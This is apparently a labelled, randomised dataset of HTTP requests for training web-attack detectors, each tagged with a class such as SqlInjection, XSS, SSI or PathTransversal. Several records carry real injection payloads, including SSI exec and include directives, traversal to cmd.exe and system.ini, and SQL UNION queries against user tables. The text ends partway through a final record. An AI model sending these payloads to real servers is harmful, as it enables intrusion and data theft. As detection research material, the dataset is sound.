User-Agent: Mozilla/6.6 (X11; U; Linux i586 0.6; yw-6k; rv:0.3.9) Gecko/37641045
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: 4.4 www.pliGeo4t.gif:73164, HTTP/1.4 www.tiune.shtml, 3.6 245.243.221.123
Transfer-Encoding: yy0as
Upgrade: eixwry/2.2, nei/4.2, gHU/2.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47132
Start - Id: 40118
class: SSI
GET /sete2eJwfmoEnpr/Rm0jVUs68K1NOzo/aq/V12q4i8o7ZpasswdHuO/riQoisrelieude.nsf?9sirunOeKNtnm=locationltbn&rncbei0=%3C%21+%23%3C%21--%23exec++cmd%3D%22id%22--%3E&dho=%28%3F1u%28emhpzdeleteiechoi1&awoy=1+aedOlogihbgo&gh5pustFn=eOuApphphu&aegbthow0tdU4t=lEo2m5rKm0&1at=+da&SyCi=8tqudlhdtbt&a-UJkJr49GG0=h5iw0%24gf%264TE6yaria&rcpJnz2=eITVm HTTP/1.0
Host: 23.158.166.5
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251;q=0.2, iso-8859-5;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.7
Cache-Control: lssj5ds=o
Client-ip: 149.0.44.161
Cookie: neuMdlyvlwnI=1stasH8seg/3setsdo;e3iup=lW.P;reuo5littjr0=fnlhewmh
Cookie2: $Version="3"
Date: Mon, 08 Sep 08 23:53:13 GMT
ETag: W/"2pP93uTxOps6cWjVyp"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Fri, 18 Nov 05 15:12:59 CET
If-Unmodified-Since: Sun, 27 Mar 05 04:20:16 UTC
If-Match: ".V7p0zEVWM4IgIWzm"
If-None-Match: "E9KpFInStExR8VetqN"
If-Range: Thu, 13 Oct 05 07:24:31 GMT
Max-Forwards: 6
MIME-Version: 3.4
Pragma: q='fnr'
Proxy-Authorization: Basic d2VuYTE1aWE6c3lhYzY=
Authorization: lcb2Rh 8feofloz=9eso
Range: 01784-577,9-7,8678-
Referer: http://www.aauouh.it/teyETCw8/hnzog/TSGle/hrkd7nci.jsp
TE: chunked,chunked;q=0.6,gzip;q=0.1
Trailer: Proxy-Authorization
User-Agent: mt2tmau (nFQ-5JT; iiw3F9gE; fJY8ptn; m_Yc.YkH; ytEC-auo)
UA-CPU: 68000
UA-Disp: 8182,5910,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 768x931
Via: yiref/1.2 www.rtes4u.htm, z14w/3.8 www.stliti9i.tiff:95164, 6.4 www.as5itv.tiff
Transfer-Encoding: compress
Upgrade: hftdus/4.4
Warning: 530 www.keiqse.jpeg "tjsEot3eeoicdet6rlc" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 3431591
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40118
Start - Id: 48597
class: XPathInjection
POST /os5od5yho/iouteuA5r/f4NselectftpNc.htm? HTTP/1.0
Content-Length: 358
Content-Language: dw1,n
Content-Encoding: deflate
Content-Location: /nEneyve/pbxlSs/hsnwrYas.tiff
Content-MD5: aGV1aWllcnJmaHJoc2J5eQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Sep 05 07:38:42 CET
Last-Modified: Mon, 12 Jun 06 17:44:59 GMT
Host: www.oraeyzaC4.com
Connection: keep-alive
Accept: text/*;q=0.6, text/*;q=0.2
Accept-Charset: koi8;q=0.4, isiri-3342
Accept-Encoding: gzip, gzip
Accept-Language: tzt4-r, 9zhi3wms-piuwl;q=0.3, oa-hara
Cache-Control: max-age=7
Client-ip: 58.151.109.14
Cookie: noixRe4yyrs=00266712;tha9Utfed2m=3867;P0nwinntgQHUtDAv=atcyTioeahn 3d;ieo;Bnf9ehw=150;orav=samwb:mouus;acona=w
Cookie2: $Version="357"
Date: Sun, 01 Feb 09 11:48:24 UTC
ETag: "24798vzil9D39PB9"
Expect: 100-continue
From: LhY2ychA@lseaat.st
If-Modified-Since: Mon, 20 Jun 05 14:16:38 CET
If-Unmodified-Since: Mon, 11 Jul 05 18:35:08 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 10 Dec 08 08:26:17 UTC
Max-Forwards: 9993
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic eG9IaTZ0ZGc6ZWZOcmg=
Authorization: Basic bGUxdDpudXpTZnE=
Range: 39-76,5-4266
Referer: http://eesKdr.uk/3q3l/nximavn/7mav/Mmtv/ftwnio.cgi
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: Mozilla/3.2 (X11; U; Open BSD i386 4.3; 3y-gr; rv:5.9.4) Gecko/87651126
UA-CPU: PowerPC
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 853x5228
Via: 7.5 www.rQnn.tiff, artjhe/1.2 www.hbAwet.gif, FTP/0.8 220.203.239.194
Transfer-Encoding: deflate
Upgrade: iroi/0.7, Osior/8.4, 9Ceim/4.8
Warning: 711 www.2azi1lut.css "nhuTpph3osOgtutn" "Sun, 02 Nov 08 07:06:07 CET"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 4557952
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

oNatrlnRnj=t/Te9tai/pem/child::node()[   position()=420]    |     Ro/Telh/oepT2t/child::text()[position()=67]     or   '8ufn6taB'  =   '&arlstaeersiwrr=d(h&tl1al=egyefafe0&NwIatjyhE=s\optoamdrop0&mt= >tsseaj]byp&_dfusr4_R=adnre&igcTintr=16&sloT5oy=trbuLnp&ueaah31ss7chao=eo|&dxBevalwYriuR=t

End - Id: 48597
Start - Id: 47554
class: XSS
GET /lswurfdsga/s.Umail@QZhDboot.iniBEJ/nxKv266QvN/1a.cfm?9Oerstoy=lliues&8ejytdbn80jrqf=amnshsoobkurloruiw&1eags4gfcsdtg=%3C%3Cscript+%3E%5Balert+%28%27pAew%27%29%3B%5D%3C%2Fscript%3E&krcyd=jefupsea&emrptsunb=O0t3&tabpvbal=eP8g&mydlNnhai=E%7Ewt&etmejUnhteabocu=60127462&orq8ns9rkwvIks=s&amwfc9iteerar=xmlIa0&hnoe1id=32826118&U5include-0G5rlVT=9z0Jsvpl&atodfedhss=80504&ieuechne=neonfs38s HTTP/1.0
Host: www.6amieioiem.gov:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-6, ks_c_5601-1987, x-mac-roman, x-mac-hebrew, x-mac-icelandic
Accept-Encoding: gzip;q=0.7, deflate, deflate
Accept-Language: uojmkaes-oot, 9tepir-IdIb1tq, 2a-sdpaz65;q=0.5, daqioh-tpdSisue, rlaam-beY4
Cache-Control: only-if-cached
Client-ip: 113.227.139.221
Cookie: ntatmsh=76;gsseits=d n<qtr;ahsrueUj5=iuAg
Cookie2: $Version="8"
Date: Mon, 15 Dec 08 07:11:20 UTC
ETag: "5Prg8S_P@.fZQyoZ"
Expect: aZpnthrk
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Sat, 29 Oct 05 16:16:14 CET
If-Unmodified-Since: Mon, 04 Feb 08 07:48:06 CET
If-Match: "Hmhu4usGYPXD65iaBV1G"
If-None-Match: "qTkrEdgRX.XPC@P"
If-Range: Tue, 27 Apr 10 13:27:28 GMT
Max-Forwards: 2
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM Nm5laWV0MGl2TnRzb0VhMnJrbG1pbmQ2ZWFkemN0Zzk1ckZCaGU=
Authorization: Digest algorithm=MD5-sess
Range: 2718-09734,749039-
Referer: /rtzae/qdoestu/dl0Trs/wei8r.html
TE: deflate,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.2 (Windows; U; Win 9x 2.2; sl-hr; rv:1.8.1) Gecko/00813883
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2187x3503
Via: HTTP/8.9 84.234.127.185, 6.5 228.22.14.50, FTP/5.2 www.eestafif.html
Transfer-Encoding: letot; tfei9=lpsya
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 112.140.177.233
X-Serial-Number: 57604389
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47554
Start - Id: 45113
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.0
Host: www.o5n4rsc9.ch
Connection: oel5i
Accept: image/jpeg;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: sSaqtc-hhms, 5htcsm3-o;q=0.7, Pskire-elxAetDn;q=0.0
Cache-Control: no-transform
Client-ip: 253.161.164.98
Cookie: hu=7606777;AGo3YSdborr46=o;oEdp=artbsk8zb;ieehidOlthe0=uhuhNt6ucttri
Cookie2: $Version="7"
Date: Wed, 29 Nov 06 04:05:56 GMT
ETag: W/"_UGzLEzbkSj@N8PU."
Expect: uhxrdEf=ynXs4rl3
From: nsarxd@yvorsnirh0.be
If-Modified-Since: Fri, 16 Nov 07 06:27:34 UTC
If-Unmodified-Since: Tue, 20 Apr 10 20:45:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 41
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: Rnue 3unc=tstl
Range: -3,456-488022
Referer: http://jdesey6.gov/Dgota5nn.cgi
TE: trailers
Trailer: Referer
User-Agent: Mozilla/3.2 (compatible; MSIE 8.6; Unix; pfpuj5csoc; fdjrl)
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0464x327
Via: HTTP/5.7 www.twtBe.html, 5.7 162.246.250.192
Transfer-Encoding: gzip
Upgrade: nu7ne/3.2
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45113
Start - Id: 39316
class: SSI
GET /aaeiesna/t@a5aziRBM7nIK6/Rjf/z3S9oDoFZKsKCf/ir0J2lysngdohdgitx.cgi?nsoLlro=9&71is=izoi5h&Gi47tnkr=653lLX5mPGzc&ftdeiotn=hpnhi&s3nlnDa=08200&cbenyrg=nPhQm3wPc&In5=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&orUsti=dGb HTTP/1.0
Host: www.ostgSAqru.net:80
Connection: JttHam
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 192.88.225.132
Cookie: Obp=c
Cookie2: $Version="211"
Date: Wed, 25 Feb 04 22:42:49 UTC
ETag: "1pA1U.J7IAhA3yekD"
Expect: aetxo=redzc
From: dZei@fOseTvsS7.biz
If-Modified-Since: Wed, 23 Dec 09 09:17:33 GMT
If-Unmodified-Since: Thu, 25 Dec 08 16:03:17 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Jun 09 03:18:49 CET
Max-Forwards: 4518
MIME-Version: 0.8
Pragma: nx8aih='sy'
Proxy-Authorization: hlfen oikmebat=iyvtk
Authorization: Digest realm
Range: 326-,2201-0740,2-99478
Referer: http://nnme8.de/mlni3r0.cfm
TE: trailers,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: s2oLOsYstd
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5234x268
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: inler
Upgrade: teeb/9.9, nsbrne/6.8, iscd2o/8.2, agY6/9.8, 3nhiao/6.5
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 802337450581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39316
Start - Id: 49551
class: XPathInjection
GET /u6/7d0sdqitosCrberIs/eNW0058Bjgc/rALTcdh/le7leinoew3m2lssa/l6GSfrsb4NvjTUEbQ.gif?othJtRR=17476&BtedasvobpEnots=i2e%2Foc%2FrIct%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D383%5D+++++%7C+t3t1%2Fge1nb%2Ftu%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D491%5D+++or++++%27eit%27%3D+%27 HTTP/1.0
Host: www.unge.biz:1289
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.8, euc-jp
Accept-Encoding: deflate
Accept-Language: tei-dm;q=0.9, aeaeeEn-0eld;q=0.4, eiqhi-t;q=0.9, s3thJx-pepara;q=0.3, w-fitrmfe;q=0.7
Cache-Control: no-transform
Client-ip: 201.175.156.200
Cookie: 3eadcrsn7A=hA6vFNwyaIw;ise=1f
Cookie2: $Version="6"
Date: Sat, 19 Apr 08 01:11:38 UTC
ETag: "hOxU9R0Q9cjkGmii_LTh"
Expect: rusi4li=en7i
From: petnihea@07eei4h.cz
If-Modified-Since: Mon, 19 Nov 07 23:21:40 UTC
If-Unmodified-Since: Wed, 22 Sep 04 12:46:18 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 3.0
Pragma: uwninaig=4Mgrc
Proxy-Authorization: Digest username="93es"
Authorization: Basic aWFsdHRoOjdvb2lncw==
Range: 6-,-33,78456-
Referer: http://www.ghmnbd.uk/tmdl0/sywalte/ishe/oV3dt/RnqOIde.bin
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/2.9 (X11; U; SunOS sun4u 3.0; ee-5r; rv:6.5.0) Gecko/93611221
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9192x115
Via: FTP/1.0 40.111.131.38:0, aniDaM/5.0 84.121.74.137
Transfer-Encoding: compress
Upgrade: os2eA/3.8, zes2/5.7, z6sc/6.6, jntir/3.8
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5171892279457940
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49551
Start - Id: 43928
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 24.21.120.39
Connection: close
Accept: text/*, text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rrrvnwwu-ieti, ay-il4a1;q=0.6, oasert-rwa;q=0.6
Cache-Control: min-fresh=6454
Client-ip: 22.30.133.135
Cookie: dbejloh=ud.;bxihl=aFmlPB
Cookie2: $Version="32"
Date: Fri, 17 Dec 04 12:51:00 GMT
ETag: W/"TWTCwcFzGF4CUXyjo"
Expect: Hqscnnpi
From: ri9h6cs@tZrtxhhdgg.be
If-Modified-Since: Tue, 03 Nov 09 17:02:38 CET
If-Unmodified-Since: Wed, 09 Jan 08 22:01:02 CET
If-Match: "Hpz7QkwsSHPIH8@F"
If-None-Match: "ysMR.zfJLfC@VBlM"
If-Range: Fri, 11 Jun 04 01:57:49 GMT
Max-Forwards: 3
MIME-Version: 3.4
Pragma: enlta8='a8fi2M'
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: Digest realm
Range: 0334-,997362-098401
Referer: /8Nnfep.cfm
TE: gzip
Trailer: If-None-Match
User-Agent: Mozilla/2.8 (Windows; U; Win98 7.2; 1e-sf; rv:4.6.5) Gecko/99551293
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: 5.6 109.99.27.18:8021, zsyj0/5.6 248.177.75.134, FTP/4.4 www.bcENe.jpeg
Transfer-Encoding: deflate
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 590 204.118.91.69 "eitd3dnkcep3Sina3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43928
Start - Id: 35123
class: SqlInjection
PUT /lRhbheroncIc/ldWPLklIa@/1zJspasswd/e7sirdhSylrx6TrtS/c9RuUrIOsBUBl/ytwi98Wty8.sh? HTTP/1.1
Content-Length: 374
Content-Language: litds
Content-Encoding: gzip
Content-Location: http://www.xkiFi.ch/tceu.avi
Content-MD5: YnNrYzN0eW5hbGNzYWxlZg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 22 Oct 06 21:35:33 CET
Host: 39.170.208.46
Connection: close
Accept: text/xml;q=0.3
Accept-Charset: windows-1252;q=0.8, cp-950;q=0.7, x-mac-hebrew;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 104.9.2.127
Cookie2: $Version="43"
Date: Fri, 30 May 08 22:10:13 GMT
Expect: otivt=3rMnsoaS
If-Modified-Since: Sat, 31 Jan 04 16:10:44 GMT
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-None-Match: "IqZKmOoHrd@xw-iN6"
If-Range: Wed, 09 Jun 04 04:31:57 GMT
Max-Forwards: 47
Pragma: bzfa=7rTdbt
Authorization: NTLM bEx0Z2Fod3Rqcmdybm9ubGxhcG9pYUk5YWV0cFpkYWhw
Range: 255878-
Referer: http://www.r7tO.net/i9pFi/2Ur0.jpeg
TE: trailers,trailers,deflate
User-Agent: uBtk4U http://www.hoee7lce.org
UA-Disp: 124,974,8
UA-OS: Win98
Via: HTTP/1.0 www.golaGf.png
Transfer-Encoding: rdtn
Upgrade: hoOeli/1.6, Aqe/6.6
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ooseRweeris6s=i9&ieeeCwsaeno=3&bu4end=9772719604&Feiln4iO9wma=hq1A&Trtk=625&nerearo=78&eN=larhzmueculaosy&aisfEtk3w7t=958&dsn=g's5x5&TC@b=iirmhr>3ltde&casnwec=unws5In6Z5&mieabiaumsos4=niU+&koe=;  exec    get_cust(   'x''  union  select    object_name,object_type,''x''  from    user_objects    where ''robiah''  =  ''  '    );

End - Id: 35123
Start - Id: 45459
class: PathTransversal
GET /rl7@IRmh/gR1AJ092pSLeh/4Vlinks_KEO0AZgs..gif?idbnotD=%26&rHisclpgen0u=sNall5&tocotN=zam&goneMyapP=f%25qnenteheeallrl&6efr=trEgstin&stoQnih=ltmIirIh&xalth6=0824&iYlyRo8shsGf0=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&v1tatuC=611&2lr=30917&o5odascund=lscanHiaautoexecn4+ecnullevala HTTP/1.0
Host: www.6nPxTqiir.net:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=824
Client-ip: 140.149.19.126
Cookie: ieont=elaqntnHtmnb;ujwenciacns=etjia8eehrT0Ltn;fYqAmetaPJb3n9s=o2s;srniTamIexdx=nbb6j;lgfmtektiD=rS3qg;uN=0h
Cookie2: $Version="0"
Date: Mon, 26 Oct 09 06:18:14 CET
ETag: W/"ykxm-pui8uIZxoq6u-"
Expect: tpgnh9nt=4tden;zuvh
From: erap@nfrIiSoBzt.gov
If-Modified-Since: Thu, 31 Jul 08 06:23:31 GMT
If-Unmodified-Since: Sat, 07 Oct 06 11:52:08 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 02 Apr 07 10:27:53 CET
Max-Forwards: 2
Pragma: eN='8'
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: HeItn1 idfse=an3Scgh
Range: -884,93-882862,81022-507
Referer: http://5faoou.cz/tsuDr2/znsuhA.nsf
TE: trailers,trailers
Trailer: Host
User-Agent: ntOroTaa/7.7.7.0.6
UA-Disp: 5444,1005,8
UA-OS: Win9x
UA-Color: color8
Via: 7.3 86.86.194.175, FTP/1.9 www.8etRee.tiff
Transfer-Encoding: compress
Upgrade: dotvf/0.0, efio7/3.4
Warning: 772 13.181.197.72 "EhhrrueNfweeetlyl" "Sun, 20 Dec 09 03:55:23 GMT"
X-Forwarded-For: 176.191.17.103
X-Serial-Number: 347804024892974921
----: -----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45459
Start - Id: 36378
class: PathTransversal
PUT /cFE.html? HTTP/1.0
Content-Length: 92
Content-Language: ptj
Content-Encoding: deflate
Content-Location: http://www.docNTyo.ch/tyeat/uirrc.nsf
Content-MD5: TnRkbm1MZW9laG5iT3JpZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 08 Sep 05 19:13:12 GMT
Last-Modified: Fri, 23 Jul 04 05:21:39 CET
Host: 59.79.1.159:60509
Connection: isSRjaju
Accept: */*;q=0.1
Accept-Charset: cp-932
Accept-Encoding: compress;q=0.8
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 133.189.1.6
Cookie: emretaeemoyo9nv=0t;usaleuqnseb=s6UwgU3QM4;fja1A=0:/.htaccess~;wdNloenag=rxZ;2ekt4vdsleeo=1b?znp[uRhlikeEee
Cookie2: $Version="99"
Date: Mon, 31 Jul 06 09:24:17 CET
ETag: "4Xjx2.ld0_56Jn1h"
Expect: eerica
If-Modified-Since: Tue, 01 Apr 08 15:18:56 UTC
If-Unmodified-Since: Fri, 23 Feb 07 20:01:42 CET
If-Match: "1r@UaIi_qPdH6PEZ0-tA"
If-None-Match: *
Max-Forwards: 3053
Pragma: no-cache
Proxy-Authorization: Basic Z2Nhc246ZVJOY2tz
Authorization: Digest opaque="9e4q"
Range: -71360
Referer: http://www.positd.ch/leiinwyn/xSaiYeas/pwdos.mspx
User-Agent: ndL2FM http://www.d8eb.st
UA-CPU: MIPS
Via: 6.0 www.sbCbn3.jpeg
Transfer-Encoding: identity
Upgrade: em8vh/0.0

tOt=0217&fn6bsptt70A2=neezh&a3hmNspireyuxh=edQsUZw&0dteiURZgfrte=ifys&ran7mkzzHNw=823&Sb=682

End - Id: 36378
Start - Id: 42357
class: SqlInjection
GET /e51rxAI7HWOZGSBMr_V/nrWqDK.4ve0hWT/JhtpasstDD8Mor/nXP2Dk1fDoT3qCScnYPi/eoddSkjd0slleSn6our/t_UbscU_nEN888D/aelosaaXa/oDevtQ/sZYH-ggdLgt32L2htg/6XSW4O5aD.tx8.YdjB@/lpstehttnlOltcbsyb/rkv5povhok6bhmetoe.js?8lpt6es=chairs%27++UNION+++++SELECT+smYnesjrgi++FROM++++dba_users+++++WHERE++name+++like+%27%2525&V4Oienyme=SwlmrtIar7&cuasea7t=1Alrioe33paadyterh&ioeltszt=lo&Hp96tfqykvch=metapadmincm&xeoslhifIOspdry=12&brm2steen=iheusretmptee&unh=oyEeeiL2re%2Foj%29&n3biOeji=858306&s0eeixweTb=ob+i&qlelusrsystemZF=7lise HTTP/1.0
Host: www.eDnfeuln.uk
Connection: close
Accept: text/*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: sE1-sDS3daue;q=0.7, emc-nonqht, r-dlLe, omEe5r-r;q=0.5
Cache-Control: me8uot='e'
Client-ip: 34.178.32.79
Cookie: qxEUTwTO25cs=863;w7c=3oa%liha
Cookie2: $Version="89"
Date: Mon, 12 Oct 09 07:35:58 UTC
ETag: "Jzw07-CaqNHQ-4c"
Expect: 100-continue
From: ttyr@nt7thnt6um.uk
If-Modified-Since: Thu, 19 Apr 07 23:00:35 UTC
If-Unmodified-Since: Tue, 05 May 09 05:10:41 UTC
If-Match: *
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: Wed, 21 Feb 07 16:25:05 CET
Max-Forwards: 4
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM dWVtZjVhZVpub2RucmxwaW1ib2luaGlub29hU3RwYTE=
Authorization: NTLM ZWRwZWhhc2Fhbm51aXdxRWVvZWloZXRhZUpxYWVlbnJl
Range: -966,396-333,-3990
Referer: http://www.ssabn1.ch/eiTwta/miePPr.php
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 2.0; ce-zr; rv:4.7.7) Gecko/11520562
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 999x243
Via: FTP/0.2 60.178.177.40
Transfer-Encoding: identity
Upgrade: ioA/2.2, sl6sg/1.0
Warning: 408 www.eaxt.js "r7iatenLagSol" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42357
Start - Id: 39846
class: SSI
PUT /iD6x37@yMMtu.kTdJ7a0/1echozoAp71/8iHdse/lsJ.jpg? HTTP/1.1
Content-Length: 172
Content-Language: jio7en,U,neats
Content-Encoding: compress
Content-Location: /kahhE/RihWe/degUr.doc
Content-MD5: b2dkc25ub2V2c3hzenJhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Dec 04 16:50:19 CET
Host: www.rt4oa7ntna.gov
Connection: sEmmoc
Accept: */*
Accept-Charset: *;q=0.3
Accept-Language: rcoote78-nixe
Client-ip: 54.127.37.145
Cookie: Bbqat=otnC;oheeeidpgo=asliSjNHG8;oter=passwd||;mrHAei8t8eL09=a@W2;cvy7ee2Esds9l=sjBCHZED;vJuistNvee=64099221
Date: Sat, 10 Jun 06 22:14:14 GMT
ETag: W/"rCmdFvTruLeWkXwHT0"
If-Match: "JwKYIoODKsWhaWlo"
If-Range: "xpRFZuVg9KlrTz-PorO"
Max-Forwards: 543
MIME-Version: 6.8
Pragma: l=1ml
Authorization: Basic Y3RvYjpsbGhhZXNj
Referer: /jDtiea/hpein.cfm
TE: trailers,trailers,deflate;q=0.5
User-Agent: <!--     #include  virtual="/var/log/httpd/access.log"    -->
UA-CPU: MIPS
Upgrade: osfv/1.5, Cdta/2.1, r5eeno/5.6, 1xwd8t/4.4
Warning: 532 www.e4tlfpo.jpg:41 "Gxns" 
X-Serial-Number: 996731164
----: -------------------

nnaAtl=tneaeeuic&1TUzRb2stylev=sr);ah &Iaccess_log-jjQu=eHWDq6Wct&F6nQincludelQ=trmw5rl&uuAm=5Ta&ecervW=<ow&vbscriptTnull[&5seaoWn=rHrd9wgiodot4ttE&atady=40450058

End - Id: 39846
Start - Id: 46780
class: XSS
PUT /oDrsrscns4nmrsb/e4L5s3iOqUU8IP8lf7y7/svlenu8poygjhsmt/tqno/EitghbmcExs6nt/ZM@DpkxdeleteS/e6eehaht.jpeg? HTTP/1.1
Content-Length: 175
Content-Language: oewvt
Content-Encoding: gzip
Content-Location: /grreprit/o1htaE/nlRm0.jsp
Content-MD5: b09ubGx1Y251bm9qdWFhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jun 05 04:04:22 UTC
Last-Modified: Wed, 04 Oct 06 07:12:36 GMT
Host: www.hhira.org
Connection: keep-alive
Accept: text/*;q=0.6
Accept-Charset: windows-1253, iso-8859-8-i
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 76.116.125.91
Cookie: lIuP=3@V4Eu;oExomF2rmeO6mlr=t| 75a9reH|eiO@;gnWuAg=f=);iuyiSmbTl=2d7varw689tphpWconnecteod;
Cookie2: $Version="216"
Date: Mon, 11 Feb 08 06:46:20 CET
ETag: W/"Ufr4QY4Us830CuN9T"
Expect: 100-continue
From: dyenT@gpt6glsG.cz
If-Modified-Since: Sat, 15 Oct 05 09:51:48 CET
If-Unmodified-Since: Thu, 05 Apr 07 01:49:49 GMT
If-Match: "CPkEzOXatVZ9gEKcjO"
If-None-Match: "Vt60Asb7ZcDmgpveNk"
If-Range: "QfKIttdW1bIcGTA-4LN"
Max-Forwards: 885
MIME-Version: 7.2
Pragma: tAZewos='lstla'
Proxy-Authorization: sdnda be5npAfd=Esnrrha
Authorization: Basic M01xc1NyaTp0ZHJz
Range: 462-
Referer: /r7Aei/koem.rar
TE: trailers,chunked;q=0.9,gzip;q=0.3
Trailer: Trailer
User-Agent: Mozilla/8.9 (compatible; erMigte7cl; Windows NT; plnWitts; sietoR; ciuari)
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1199x1516
Via: 4.2 95.239.189.82, eneyo/9.0 181.234.52.117
Transfer-Encoding: deflate
Upgrade: ggs4o/0.2, ohoge/3.3, yemtX/6.0, tweoe/2.9, anym/6.6
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 80684101
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

noeIms73eacg=ceyt&hicc=z stdin&Edbsneonimi=3714789259&Tmllw=<div   style  =" background-image:  url(javascript: [alert ('glxditw');]);  "   >

End - Id: 46780
Start - Id: 42704
class: SqlInjection
PUT /P1cde.msf? HTTP/1.1
Content-Length: 284
Content-Language: aw0lnrv,5sxeI
Content-Encoding: identity
Content-Location: /isaash.exe
Content-MD5: d29JenNqb2FnYmVzRXBsbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Sep 06 01:01:17 UTC
